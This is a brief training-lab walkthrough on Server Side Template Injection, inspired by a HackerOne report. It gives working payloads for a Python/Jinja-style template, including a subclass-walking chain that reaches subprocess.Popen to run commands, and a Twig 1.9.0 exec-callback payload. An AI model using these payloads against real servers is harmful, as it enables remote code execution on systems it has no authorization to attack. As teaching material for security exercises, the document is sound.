Server Side Template Injection
Tools which could be used is tplmap
This exercise was inspired by the following Hackerone report: https://hackerone.com/reports/125980. In this exercise, the bug is located in the 404 error management.
This report gives you the foundation to:
Test {{'7'*7}}
Get code execution:
{{''.__class__.mro()[1].__subclasses__()}} Check the report carefully, as you can see that the __ are hidden due to the processing of the data as Markdown in the initial report.
You may need to change the value 1 to get the list of interesting functions. Once you get it, you will need to find one that will give you code execution. You can use the following payload to get access to <class 'subprocess.Popen'>:
{{''.__class__.mro()[1].__subclasses__()[X]}}Where X is the integer you need to find.
Finally, you can call this method using:
{{''.__class__.mro()[1].__subclasses__()[X](COMMAND)}}Where:
X was found previously.
COMMAND is the command you want to run.
Make sure you read the Python documentation for the popen to make sure you have get the right syntax for the command (or add the right option).
This challenge covers the exploitation of a Server Side Template Injection in an old version of Twig (1.9.0).
This issue can be used to gain code execution on the server. To get code execution you need to find a way to execute command using the functions offered by the template. Fortunately, the following code can be used:
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('uname')}}Using this code, you should be able to score this exercise.
Last updated